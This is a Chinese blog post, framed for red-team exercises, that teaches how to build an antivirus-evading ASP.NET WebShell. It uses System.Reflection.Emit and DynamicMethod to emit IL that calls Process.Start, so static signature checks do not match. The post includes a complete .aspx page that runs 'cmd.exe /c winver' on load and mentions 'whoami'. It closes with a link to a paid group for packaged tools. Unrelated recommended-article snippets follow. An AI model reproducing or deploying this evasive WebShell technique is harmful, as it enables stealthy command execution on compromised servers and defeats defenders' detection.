.NET Emit 技术打造免杀 WebShell 突破安全壁垒

于 2025-07-14 08:30:00 发布
阅读量485 收藏 7
点赞数 12
CC 4.0 BY-SA版权
文章标签: 安全 .net web安全 矩阵
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ahhacker86/article/details/149243555

在当下的红队攻防演练活动里,WebShell 仍旧是攻击者实现内网初始渗透落地、横向拓展渗透范围以及维持系统权限的关键手段之一。不过,随着主流杀毒软件不断更新针对传统 WebShell 的签名库,特别是对像 Process.Start 这类关键 API 的监控力度持续加大,红队面临着新的挑战——如何绕过杀毒软件的检测。

01. 剖析 Emit 技术

在此背景下,今天为大家介绍一种利用 System.Reflection.Emit 所具备的动态代码生成能力,达成免杀执行命令的方法。该方法借助 IL 动态拼装技术来执行 “cmd.exe /c whoami” 命令,在 WebShell 的应用场景中顺利完成命令执行操作,进而绕过绝大多数基于关键字符串特征匹配的防御机制。

在 .NET 框架的丰富功能体系中,System.Reflection.Emit 犹如一颗璀璨的明珠,它为开发者提供了一套强大且灵活的 API 集合,专门用于在程序运行期间动态地生成和执行代码。这一特性赋予了开发者极大的自由度,使得他们能够在程序运行时按需构建程序集、模块、类型以及方法,并通过中间语言(IL)指令来精准定义这些代码的具体行为。

图片

1.1 深入理解IL指令

在 .NET 的编译与执行流程中,C#、VB.NET 等高级语言所编写的代码并不会直接转换为机器码,而是会经历一个中间阶段——编译成中间语言(IL)。IL 是一种面向对象的低级语言,其风格与汇编语言颇为相似。它作为 .NET 生态中的关键一环,由 .NET 公共语言运行库(CLR)中的即时(JIT)编译器在程序运行时动态地翻译成原生机器码,从而确保程序能够在不同的硬件平台上顺利执行。

从这个角度来看,IL 堪称 .NET 的汇编层。对于安全研究人员和攻击者来说,IL 就像是一扇观察程序运行细节的窗户,透过它能够洞察程序在底层的执行逻辑。而对于红队而言,IL 更是通过 System.Reflection.Emit 构造恶意行为的绝佳“注射点”。通过巧妙地操控 IL 指令,红队能够在目标系统中植入隐蔽的恶意代码,实现各种攻击目标。

IL 采用的是栈式指令集模型,这与传统的 x86 架构有着显著的区别。在 x86 架构中,运算主要依赖于寄存器,而 IL 则摒弃了这种方式,所有的操作都基于“压栈 - 弹栈”的机制来执行。具体来说,当需要使用某个数据时,先将其压入栈中;当需要对该数据进行操作时,再从栈中弹出并进行相应的处理。每条 IL 指令都精确地控制着一次操作,例如加载常量、调用方法等。而且,所有的方法都必须以 Ret 指令作为结尾,这标志着方法的执行结束并将控制权返回给调用者。

为了更好地理解 IL 指令,我们来看一个具体的例子。假设我们有以下一段简单的 .NET 代码:

Process.Start("cmd.exe","/c whoami");

这段代码的功能是启动一个命令提示符窗口并执行 whoami 命令,用于显示当前用户的身份信息。当这段代码被编译成 IL 形式时,大致如下:

ldstr      "cmd.exe"
ldstr      "/c whoami"
call       System.Diagnostics.Process::Start(string,string)
pop
ret

这里的每一行代码都对应着一个特定的 IL 指令。ldstr 指令用于将字符串常量压入栈中,第一个 ldstr "cmd.exe" 将字符串 "cmd.exe" 压入栈,第二个 ldstr "/c whoami" 将字符串 "/c whoami" 压入栈。接着,call 指令用于调用指定的方法,这里调用的是 System.Diagnostics.Process.Start(string,string) 方法,该方法会从栈中弹出两个字符串参数并启动相应的进程。pop 指令用于弹出栈顶的元素,最后 ret 指令结束方法的执行并将控制权返回。

这些 OpCodes(操作码)就用 DynamicMethod 或 ILGenerator.Emit() 时所发出的“指令语句”。通过组合这些指令,我们可以构建出各种复杂的逻辑。

对于红队来说,掌握 IL 指令就如同掌握了一门针对 .NET 的“武装汇编语言”。利用 System.Reflection.Emit 技术,红队可以无中生有地生成任意函数逻辑。这种动态生成代码的能力使得红队能够轻松地绕过一切静态检测规则。因为静态检测通常是基于代码的固定特征进行分析的,而动态生成的代码在编译时并不存在,只有在运行时才会被创建和执行,所以静态检测工具很难发现其中的恶意行为。

1.2 动态方法

DynamicMethod 本质上是一种轻量级的托管函数定义方式,它与常规方法有着显著的区别。常规方法通常依赖于程序集或模块文件,这些文件会被写入磁盘,在程序加载时被读取和解析。而 DynamicMethod 则完全摆脱了对程序集或模块文件的依赖,它不需要将代码写入磁盘,所有的定义和执行过程都在内存中完成。这种特性使得 DynamicMethod 生成的代码更加隐蔽,难以被传统的磁盘扫描工具发现。

此外,常规方法在定义和调用过程中需要经过一系列复杂的加载和解析步骤,而 DynamicMethod 可以通过委托快速绑定并调用。委托是一种引用方法的类型,它提供了一种将方法作为参数传递、存储和调用的机制。通过将 DynamicMethod 与委托相结合,开发者可以在内存中快速创建并执行方法,大大提高了代码的执行效率和灵活性。

DynamicMethod 的构造过程相对简洁而高效。首先,我们使用以下代码创建一个 DynamicMethod 实例:

var method =newDynamicMethod("MyMethod", returnType, parameterTypes, ownerModule);

在这个构造函数中,"MyMethod" 是为动态方法指定的名称,虽然这个名称在运行时并不会对方法的执行产生实质性的影响,但它可以用于调试和标识。returnType 指定了方法的返回类型,parameterTypes 是一个数组,用于指定方法的参数类型,ownerModule 则指定了方法所属的模块,通常可以设置为 typeof(SomeType).Module 的形式。

图片

创建好 DynamicMethod 实例后,我们通过调用 GetILGenerator() 方法获取一个 ILGenerator 实例。ILGenerator 就像是一位技艺高超的汇编语言工匠,它提供了类似汇编语言的操作码(OpCodes)接口。通过这个接口,我们可以逐条发出 MSIL(Microsoft Intermediate Language)指令,实现对方法逻辑的精细控制和各种 API 的调用。例如,我们可以使用 ldstr 指令加载字符串常量,使用 call 指令调用其他方法,使用 ret 指令结束方法的执行等。通过巧妙地组合这些指令,我们可以在内存中构建出任意复杂的逻辑,实现各种恶意或合法的功能。

02. Emit 最佳实践

下面,我们将借助一个具体且详细的示例,深入剖析如何巧妙运用 DynamicMethod 和 ILGenerator 来动态构建方法,进而实现启动系统进程的操作,以此展示一种极具隐蔽性的 WebShell 实现方式。

 

<%@ Import Namespace="System.Reflection.Emit"%>
<script runat="server" language="c#">
voidPage_load(){
// 创建一个名为"Main"的动态方法,该方法无返回值且无参数
var method =newDynamicMethod("Main",null, Type.EmptyTypes);
// 获取该动态方法的 IL 代码生成器
var ilGenerator = method.GetILGenerator();

// 插入一条无操作指令,在某些情况下可用于填充或调试对齐
    ilGenerator.Emit(OpCodes.Nop);
// 将字符串"cmd.exe"压入计算栈
    ilGenerator.Emit(OpCodes.Ldstr,"cmd.exe");
// 将字符串"/c winver"压入计算栈
    ilGenerator.Emit(OpCodes.Ldstr,"/c winver");
// 调用 System.Diagnostics.Process 类的 Start 方法,该方法接受两个字符串参数
    ilGenerator.Emit(OpCodes.Call,typeof(System.Diagnostics.Process).GetMethod("Start",
newType[]{typeof(string),typeof(string)}));
// 弹出计算栈顶的元素(Process.Start 方法返回的值,此处无实际用途)
    ilGenerator.Emit(OpCodes.Pop);
// 方法返回指令,结束当前方法的执行
    ilGenerator.Emit(OpCodes.Ret);

// 将动态方法创建为 Action 委托类型的实例
var helloWorldMethod = method.CreateDelegate(typeof(Action))asAction;
// 调用委托,执行动态方法
    helloWorldMethod.Invoke();
}
</script>
 

这段代码的核心在于利用 DynamicMethod 创建了一个匿名方法。DynamicMethod 是 System.Reflection.Emit 命名空间下的一个强大类,它允许在运行时动态创建方法,且这些方法不依赖于传统的程序集或模块文件,完全在内存中定义和执行。
 

 

 

首先,通过 new DynamicMethod("Main", null, Type.EmptyTypes) 创建了一个名为 "Main" 的动态方法,该方法没有返回值(null 表示返回类型为 void)且不接受任何参数(Type.EmptyTypes 表示参数类型数组为空)。
 

接着,使用 GetILGenerator() 方法获取该动态方法的 IL 代码生成器 ilGenerator。IL(Intermediate Language)是 .NET 框架中的中间语言,类似于汇编语言,通过它可以精确控制方法的执行逻辑。
 

 

图片
 

在 IL 指令生成部分:
 

  • ilGenerator.Emit(OpCodes.Nop) 
     插入一条无操作指令,这条指令本身不执行任何实际操作,但在某些情况下可用于代码填充或调试对齐。
     
  • ilGenerator.Emit(OpCodes.Ldstr, "cmd.exe") 
     和 ilGenerator.Emit(OpCodes.Ldstr, "/c winver") 分别将字符串 "cmd.exe" 和 "/c winver" 压入计算栈。计算栈是 IL 执行过程中的一个重要数据结构,用于存储操作数和中间结果。
     
  • ilGenerator.Emit(OpCodes.Call, typeof(System.Diagnostics.Process).GetMethod("Start", new Type[]{typeof(string), typeof(string)})) 
     调用 System.Diagnostics.Process 类的 Start 方法。这里通过反射获取 Start 方法,该方法接受两个字符串参数,分别是要启动的进程名称和命令行参数。
     
  • ilGenerator.Emit(OpCodes.Pop) 
     弹出计算栈顶的元素,即 Process.Start 方法返回的值。由于我们并不关心这个返回值,所以使用 Pop 指令将其丢弃。
     
  • ilGenerator.Emit(OpCodes.Ret) 
     是方法返回指令,标志着当前方法的执行结束,将控制权返回给调用者。
     
 

最后,通过 method.CreateDelegate(typeof(Action)) as Action 将动态方法创建为 Action 委托类型的实例,然后调用 helloWorldMethod.Invoke() 执行该委托,从而触发动态方法的执行。
 

当这段代码在服务器上执行时,它会成功调用 cmd.exe /c winver 命令,启动系统版本信息窗口。这一过程悄无声息地绕过了安全检测,展示了 Emit 技术在构建隐蔽 WebShell 方面的强大能力和潜在威胁,如下图所示。
 

 

图片
 

03.NET安全扩展学习
 

 

 文/章/涉/及/的/工/具/已/打/包,请//加//入//后/下//载:https://wx.zsxq.com/group/51121224455454 

                

        

    

    
  



    



                



	

		

			

				
					
.NET Emit 入门教程:第一部分:Emit 介绍:什么是 Emit

				
			

			

				

					路过秋天 - 理想很美好,现实很残酷,坚持在路上,只因初心仍存
				

				

					03-20
					
					1391
					
				

			

		

		

			
				
.NET开发中,Emit 是一种动态生成IL代码的技术,通过使用 System.Reflection.Emit 命名空间中的类,可以在运行时创建和修改程序集、类型和方法。这种技术为开发人员提供了一种强大的方式来在运行时动态生成和执行代码:Emit 技术通常用于解决需要在运行时动态生成代码的特定场景,例如在ORM(对象关系映射)框架中动态创建实体类,或者在AOP(面向切面编程)中动态创建代理类。

			
		

	



                

            
              



	

		

			

				
					
.NET Emit 入门教程:第六部分:IL 指令:9:详解 ILGenerator 指令方法:运算操作指令(指令篇结束)

				
			

			

				

					路过秋天 - 理想很美好,现实很残酷,坚持在路上,只因初心仍存
				

				

					04-24
					
					1287
					
				

			

		

		

			
				
.NET Emit 编程中,运算操作指令是一类关键的IL(Intermediate Language)指令,用于在动态生成的代码中执行各种数学运算、位操作和比较操作。这些指令允许开发人员对操作数进行加法、减法、乘法、除法、逻辑与、逻辑或、逻辑非、位与、位或、位异或、左移、右移以及比较等操作。通过运算操作指令,开发人员能够在动态生成的代码中实现各种算术运算、逻辑运算和位操作,从而更灵活地处理数据和实现复杂的逻辑。这些指令为动态代码生成提供了强大的功能,使得开发人员能够根据需要生成高效且功能丰富的代码。

			
		

	



              


  
              

                


	

		

			

				
					
.NET平台常见技术框架整理汇总

				
			

			

				

					那里有颗树
				

				

					01-05
					
					2939
					
				

			

		

		

			
				
使用.NET平台开发有段时间了,在网上资料的基础上做了进一步整理,汇集了.NET平台常见的技术框架。
参考资料:


基于.NET平台常用的框架整理.NET开源框架列表


1.知识网络



2.分类清单

2.1.分布式缓存框架

名称
			说明
			地址
		Windows Server AppFabric
			微软自家分布式缓存服务框架, 扩展了 Windows Server 为 Web 应用程序和中间层服务提供增强的托管、管理和缓存功能
			https://www.microsoft.co

			
		

	





	

		

			

				
					
C#/.NET/.NET Core技术前沿周刊 | 第 41 期(2025年6.1-6.8)

				
			

			

				

					专注于C#/.NET/.NET Core学习、工作、面试干货和实战教程分享。这里聚焦了大量的C#/.NET/.NET Core优质文章、开源项目、实用工具和学习、工作、面试心得。
				

				

					06-10
					
					1414
					
				

			

		

		

			
				
C#/.NET/.NET Core技术前沿周刊,你的每周技术指南针!记录、追踪C#/.NET/.NET Core领域、生态的每周最新、最实用、最有价值的技术文章、社区动态、优质项目和学习资源等。让你时刻站在技术前沿,助力技术成长与视野拓宽。欢迎投稿、推荐或自荐优质文章、项目、学习资源等。docs/DotNet/DotNetWeekly.md · 追逐时光者/DotNetGuide - Gitee.com。

			
		

	



		

			
		



	

		

			

				
					
Shellcode对抗(C/C++)

				
			

			

				

					qq_74806534的博客
				

				

					02-17
					
					2万+
					
				

			

		

		

			
				
这里便是毒软件毒的原理,这就是特征,我们只需要将木马程序进行简单的分析,就能得到shell回连的IP地址和端口,如果毒软件发现我们的可执行文件是一个木马程序。加载器的作用:由于shellcode是一段可以执行的二进制代码,因此需要开辟出一段可以读写可操作的地址来运行shellcode,而这就是加载器的作用。之后打开.c文件是一个未编译代码,放到上文的编译代码中,注意这里是x64编译,用的方式三,使用.c文件。因为我们的加载器的特征,各平台毒软件都有了已经,所有我们就要用新的,特征没有被锁定。

			
		

	





	

		

			

				
					
.Net -- 通过Emit反射动态代理实现AOP

				
			

			

				

					哈怂的博客
				

				

					01-18
					
					1371
					
				

			

		

		

			
				
AOP: 面向切面编程,通过预编译方式和运行期间动态代理实现程序功能的统一维护的技术。
利用AOP可以对业务逻辑的各个部分进行隔离,从而使得业务逻辑各部分之间的耦合度降低,提高程序的可重用性,同时提高了开发的效率。
AOP的使用场景主要包括日志记录、性能统计、安全控制、事务处理、异常处理等。

			
		

	





	

		

			

				
					
详解c# Emit技术

				
			

			

				

					chinaherolts2008的博客
				

				

					04-05
					
					2441
					
				

			

		

		

			
				
我们常常有一个应用场景,由我们的C#代码,动态生成一个EXE,其应用场景可以非常多,比如软件授权,可以输入授权信息后,生成一个授权的DLL等,那如何实现这个功能呢,就要提到一个技术Emit。
1、Emit概述
Emit,可以称为发出或者产生。在Framework中,与Emit相关的类基本都存在于System.Reflection.Emit命名
空间下。可见Emit是作为反射的一个元素存在的。说道反射,大家应该都不陌生,它允许我们查看程序集的元素据,从而取得形如程序集包含哪些类型,类型包
含哪些方法等等大量的

			
		

	





	

		

			

				
					
vue中 关于$emit的用法

					
热门推荐

				
			

			

				

					榴莲不好吃的专栏
				

				

					11-21
					
					81万+
					
				

			

		

		

			
				
1、父组件可以使用 props 把数据传给子组件。
2、子组件可以使用 $emit 触发父组件的自定义事件。

vm.$emit( event, arg ) //触发当前实例上的事件

vm.$on( event, fn );//监听event事件后运行 fn;

例如:子组件:


<template>
  <div class="train-city">
    &l............

			
		

	





	

		

			

				
					
迁移.net framework 工程到.net core

				
			

			

				

					首席技术总监的专栏
				

				

					09-13
					
					1716
					
				

			

		

		

			
				
在迁移.net core的过程中,第一步就是要把.net framework 工程的目标框架改为.net core2.0,但是官网却没有提供转换工具,需要我们自己动手完成了。因为.net core 工程不支持排除文件,所以在完成上述迁移后,原来隐藏的文件会自动添加到工程中,对这些垃圾文件,请识别后,手工删除即可。说一下,很多.net framework的API在.net core中已经没有了,正在迁移前,请看一下下面的.net core的资料。1.创建一个.net core的工程,然后把所有的文件挪过去。

			
		

	





	

		

			

				
					
为什么 .NET 的反射这么慢?

				
			

			

				

					勿忘初心
				

				

					12-26
					
					4715
					
				

			

		

		

			
				
大家都知道.NET的反射很慢,但是为什么会出现这种情况呢?这篇文章会带你寻找这个问题的真正原因。

CLR 类型系统的设计目标

原因之一是,在设计的时候反射本身就不是以高性能为目标的,可以参考Type System Overview - ‘Design Goals and Non-goals’(类型系统概览 - ‘设计目标和非目标’):


目标


	运行时通过快速执行(非反射)代码访问需...

			
		

	





	

		

			

				
					
.NET(C#):Emit创建异常处理的方法

				
			

			

				

					09-05
				

			

		

		

			
				
.NET框架的动态方法生成是通过System.Reflection.Emit命名空间中的类实现的,这使得开发者能够在运行时动态地构建和执行IL代码。在这个场景中,我们关注的是如何使用Emit来创建包含异常处理逻辑的方法。异常处理在C#...

			
		

	





	

		

			

				
					
.NET Emit 入门教程:第一部分:Emit 介绍:Emit 的作用和优势(下)

				
			

			

				

					路过秋天 - 理想很美好,现实很残酷,坚持在路上,只因初心仍存
				

				

					03-20
					
					436
					
				

			

		

		

			
				
Emit 作为.NET开发中的一项重要技术,具有诸多作用和优势。在本文中,我们将探讨Emit技术的作用以及其在实际开发中的优势。

			
		

	





	

		

			

				
					
AI黑客登顶背后:Agent驱动下的安全演习提效实践

				
			

			

				

					Tencent_SRC的博客
				

				

					07-10
					
					548
					
				

			

		

		

			
				
更像是在成熟的静态代码审计和动态安全验证体系上构建的一个黑客智能体,让AI通过执行命令和调用工具来完成渗透流程的关键环节,在XSS这类有着非常明确的漏洞模式的场景上效果不错,但在越权等业务逻辑漏洞场景表现并不佳,当前并没有达到官方宣称的100%AI自主渗透,甚至还有一定的刷分与AI含量注水嫌疑,但相比当前的人类安全专家。很巧妙的利用了一些平台的规则漏洞。登顶到朱雀蓝军Bot的实践,我们看到的并非是AI对人类安全专家的替代,而是AI作为工具的不断进化,从而实现效率的。

			
		

	





	

		

			

				
					
从零到一:企业如何组建安全团队

					
最新发布

				
			

			

				

					TechVision大咖圈聚合全球科技大咖,洞察AI、云计算、大数据等前沿趋势,为企业决策者提供智见未来的转型路径。
				

				

					07-12
					
					1044
					
				

			

		

		

			
				
数据显示,2024年全球网络攻击事件同比增长了38%,平均每39秒就有一次攻击发生。更可怕的是,93%的企业网络都能在72小时内被渗透。

听起来是不是很吓人?但这就是我们面临的现实。

			
		

	





	

		

			

				
					
小赛安全智脑×动态MCP Server:让组件API对接像搭积木一样简单

				
			

			

				

					Sinovatio_002912的博客
				

				

					07-09
					
					947
					
				

			

		

		

			
				
是否存在一种解决方案,能让智能体像使用“万能插头”一样,直接以统一的方式控制所有组件,从而摆脱这些繁琐的适配工作呢?

			
		

	





	

		

			

				
					
LKT4304稳定可靠高兼容性国产安全加密芯片

				
			

			

				

					tyl2110的专栏
				

				

					07-09
					
					178
					
				

			

		

		

			
				
LKT4304是凌科芯安专为物联网应用场景而推出的一款安全加密芯片,支持3DES/DES、RSA、AES、SHA-1/256、SM1、SM2、SM3、SM4等全系列金融级标准算法与国密算法,KT4304芯片通常作为从机使用,支持IIC和SPI接口,新一代高性能32位安全内核,最高内频可达90MHz,通过身份认证或自定义方案验证身份,加密收发数据保证设备安全运行并保证上传到服务器数据的私密性。随着 IOT 的飞速发展,智能家居,智能汽车,智能工控等物联网设备和云服务的安全问题成为IOT普及的关键障碍。

			
		

	





	

		

			

				
					
费应用分发平台的安全漏洞和防护机制是什么?

				
			

			

				

					gulu230220的博客
				

				

					07-11
					
					379
					
				

			

		

		

			
				
通过加强用户教育与意识提升、与开发者建立紧密的合作关系、建立安全联盟与信息共享机制、持续的技术创新与升级以及加强用户隐私保护与合规性管理等方面的努力,平台可以为用户提供更加安全、可靠的应用分发服务。平台应加强对用户的安全教育,通过发布安全指南、安全提示等方式,提高用户对网络安全的认识和警惕性。此外,平台还可以参与相关的安全标准和规范的制定工作,推动整个行业的安全发展。综上所述,费应用分发平台需要不断加强安全防护措施,提高应对网络安全威胁的能力,为用户提供更加安全、可靠的应用分发服务。

			
		

	





	

		

			

				
					
预防DNS 解析器安全威胁

				
			

			

				

					ITmoster的博客
				

				

					07-11
					
					932
					
				

			

		

		

			
				
DNS 解析器是一种计算机程序或工具,用于将域名解析为对应的 IP 地址。DNS(Domain Name System)是互联网上用于将域名(例如 example.com)转换为相应 IP 地址(例如 192.0.2.1)的系统。DNS 解析器通过查询 DNS 服务器来获取域名的 IP 地址,使得计算机能够通过域名访问到相应的网站或服务。

			
		

	





	

		

			

				
					
水陆联防智能升级:AI入侵检测系统守护零死角安全

				
			

			

				

					hahahaha_1233333的博客
				

				

					07-10
					
					270
					
				

			

		

		

			
				
技术壁垒:

1. 极端环境适配

   - 抗盐雾腐蚀外壳(IP68)  

   - 浓雾穿透算法(能见度<50米仍可检测)  

2. 轻量化边缘计算

   - 模型压缩至42MB,200ms完成船舶行为分析  

   - 断网环境下持续工作72小时  

3. 反规避检测能力

   - 热源伪装识别:区分人体与加热假人  

   - 车牌伪造检测:字符笔画形态分析 

			
		

	





	

		

			

				
					
.NET Emit

				
			

			

				

					03-12
				

			

		

		

			
				
### .NET Emit 使用教程及常见问题解决方案

#### 什么是Emit?

动态创建和操作IL(中间语言)代码的能力是.NET框架的一个强大特性。`System.Reflection.Emit`命名空间提供了一组类来帮助开发者在运行时生成和操纵程序集、模块以及类型定义。

- `AssemblyBuilder`: 创建新的程序集。
- `ModuleBuilder`: 定义新类型的容器,在其中可以添加字段、方法和其他成员。
- `TypeBuilder`: 构建自定义类型。
- `MethodBuilder`, `ConstructorBuilder`: 分别用于构建方法体和构造函数。
- `ILGenerator`: 发射实际的MSIL字节码到方法体内[^1]。

#### 基本使用案例

下面是一个简单的例子,演示如何利用Emit技术创建一个带有简单加法运算的方法:

```csharp
using System;
using System.Reflection;
using System.Reflection.Emit;

class Program {
    static void Main(string[] args) {
        AppDomain myDomain = Thread.GetDomain();
        AssemblyName assemblyName = new("DynamicAddition");
        
        // Create a dynamic assembly and module.
        var assemblyBuilder = myDomain.DefineDynamicAssembly(
            assemblyName,
            AssemblyBuilderAccess.Run);
            
        ModuleBuilder moduleBuilder = assemblyBuilder.DefineDynamicModule("MainModule");

        TypeBuilder typeBuilder = moduleBuilder.DefineType("MathOperations",
                TypeAttributes.Public |
                TypeAttributes.Class |
                TypeAttributes.AutoClass |
                TypeAttributes.AnsiClass |
                TypeAttributes.BeforeFieldInit |
                TypeAttributes.AutoLayout);

        MethodBuilder methodBuilder = typeBuilder.DefineMethod("AddNumbers",
                    MethodAttributes.Public | MethodAttributes.Static,
                    typeof(int),
                    new Type[]{typeof(int), typeof(int)});
                    
        ILGenerator ilGen = methodBuilder.GetILGenerator();

        // Load first argument onto the stack (arg_0).
        ilGen.Emit(OpCodes.Ldarg_0);
        // Load second argument onto the stack (arg_1).
        ilGen.Emit(OpCodes.Ldarg_1);
        // Add two values on top of the evaluation stack together.
        ilGen.Emit(OpCodes.Add);
        // Return result from function call.
        ilGen.Emit(OpCodes.Ret);

        Type mathOpsType = typeBuilder.CreateTypeInfo().AsType();
        MethodInfo addMethodInfo = mathOpsType.GetMethod("AddNumbers");

        Console.WriteLine(addMethodInfo.Invoke(null, new object[]{5, 3}));
    }
}
```

这段代码展示了怎样通过发射机制建立了一个名为`MathOperations`的新类型,并在其内部实现了静态整数相加的功能。最后调用了这个方法并打印出了结果。

#### 常见问题及其解答

##### 性能考量

虽然Emit允许灵活地生成代码,但在某些情况下可能会引入额外开销。对于频繁执行的操作来说,应该评估是否真的有必要采用这种方式而不是预先编译好的二进制文件。另外需要注意的是,过多依赖于反射也会带来一定的性能损失[^4]。

##### 错误处理

当尝试加载非法或不符合当前上下文环境的状态时,很容易遇到异常情况。因此建议总是捕获潜在错误并在适当时候给予反馈给用户。例如,如果试图在一个已经完成初始化的对象上继续修改其结构,则会抛出InvalidOperationException;而在向不存在的目标应用域发送请求时则可能出现TargetInvocationException等。

##### 调试困难度增加

由于这些由Emit产生的代码是在应用程序启动之后才被即时编译出来的,所以传统的调试工具可能无法很好地支持这类场景下的断点设置等功能。这使得开发人员不得不采取更间接的方式来验证逻辑正确性,比如借助日志记录或是单元测试等方式来进行辅助排查工作。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

  
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  





	
打赏作者

	

		

		
			
		
		

		

			
dot.Net安全矩阵

			
你的鼓励将是我创作的最大动力

		

	

	

			

	

	

    ¥1
    ¥2
    ¥4
    ¥6
    ¥10
    ¥20
	

	

		

			

				

					扫码支付:¥1
				

				

					

					
					获取中
					

				

				

					
					
					扫码支付
				

			

		

		

			
您的余额不足,请更换扫码支付或充值

			
打赏作者

		

	



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值